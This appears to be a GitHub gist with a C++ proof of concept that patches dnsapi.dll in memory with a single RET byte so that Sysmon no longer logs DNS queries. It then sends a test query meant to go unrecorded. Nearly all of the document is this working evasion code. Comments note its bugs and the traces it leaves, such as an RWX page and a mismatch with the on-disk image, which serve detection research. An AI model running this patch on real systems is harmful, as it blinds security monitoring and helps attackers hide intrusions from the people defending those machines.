Last active
May 4, 2022 15:47
#include <iostream> | |
#include <Windows.h> | |
#include <WinDNS.h> | |
// Pattern for hunting dnsapi!McTemplateU0zqxqz | |
#define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c" | |
#define PATTERN_LEN 14 | |
// Locate `signature` in the memory that starts at `mem`.
//
// Scans a fixed window of 0x200000 bytes (2 MiB) from `mem`. The bound is a
// constant, not the size of the mapped module: if the image is smaller than
// the window the scan reads beyond it, and the final memcmp can read up to
// signatureLen - 1 bytes past the window. A two-byte prefilter runs before the
// full-length compare.
//
// Returns the byte offset of the first match. `offset` starts at 0 and is only
// assigned on a hit, so "not found" is also reported as 0 and cannot be told
// apart from a genuine match at offset 0 -- callers have to treat 0 as suspect.
DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) { | |
    ULONG offset = 0; | |
    for (int i = 0; i < 0x200000; i++) { | |
        // Cheap first/second-byte check before the full-length compare.
        if (*(unsigned char*)(mem + i) == signature[0] && *(unsigned char*)(mem + i + 1) == signature[1]) { | |
            if (memcmp(mem + i, signature, signatureLen) == 0) { | |
                // Found the signature | |
                offset = i; | |
                break; | |
            } | |
        } | |
    } | |
    return offset; | |
} | |
// Proof-of-concept entry point. Loads dnsapi.dll into this process, finds
// PATTERN (per the comment above, the start of dnsapi!McTemplateU0zqxqz --
// presumably the event-template routine Sysmon's DNS event depends on; confirm)
// and overwrites its first byte with 0xC3 (`ret`), so the routine returns
// immediately. A DNS query is then issued to exercise the patched path.
//
// Observable side effects relevant for detection:
//  - the code page holding the patch is switched to PAGE_EXECUTE_READWRITE and
//    (see below) never switched back, leaving an RWX page inside the mapped
//    dnsapi.dll image;
//  - one byte of the mapped image no longer matches the on-disk file.
int main() | |
{ | |
    // Filled in by VirtualProtect; stays uninitialized if that call fails, and
    // neither VirtualProtect call's return value is checked.
    DWORD oldProtect, oldOldProtect; | |
    printf("DNS Sysmon Bypass POC\n by @_xpn_\n\n"); | |
    // The HMODULE is used directly as the image base address for byte scanning.
    unsigned char *dll = (unsigned char *)LoadLibraryA("dnsapi.dll"); | |
    if (dll == (void*)0) { | |
        printf("[x] Could not load dnsapi.dll\n"); | |
        return 1; | |
    } | |
    // SearchPattern returns 0 both for "not found" and for a match at offset 0;
    // the result is not checked, so a miss would patch the first byte of the
    // image (the start of the PE headers) instead of the intended routine.
    DWORD patternOffset = SearchPattern(dll, PATTERN, PATTERN_LEN); | |
    // DWORD is unsigned long; %d is not the matching conversion specifier.
    printf("[*] Pattern found at offset %d\n", patternOffset); | |
    printf("[*] Patching with RET\n"); | |
    VirtualProtect(dll + patternOffset, 10, PAGE_EXECUTE_READWRITE, &oldProtect); | |
    // 0xC3 = x86/x64 `ret`: the routine now returns before doing anything.
    *(dll + patternOffset) = 0xc3; | |
    // Restores protection at `dll` (the image base), not at dll + patternOffset,
    // so the patched page keeps PAGE_EXECUTE_READWRITE.
    VirtualProtect(dll, 10, oldProtect, &oldOldProtect); | |
    printf("[*] Sending DNS Query... should now not be detected\n"); | |
    // Return value ignored; the query exists only to drive the patched path.
    DnsQuery_A("blog.xpnsec.com", DNS_TYPE_A, DNS_QUERY_STANDARD, NULL, NULL, NULL); | |
} |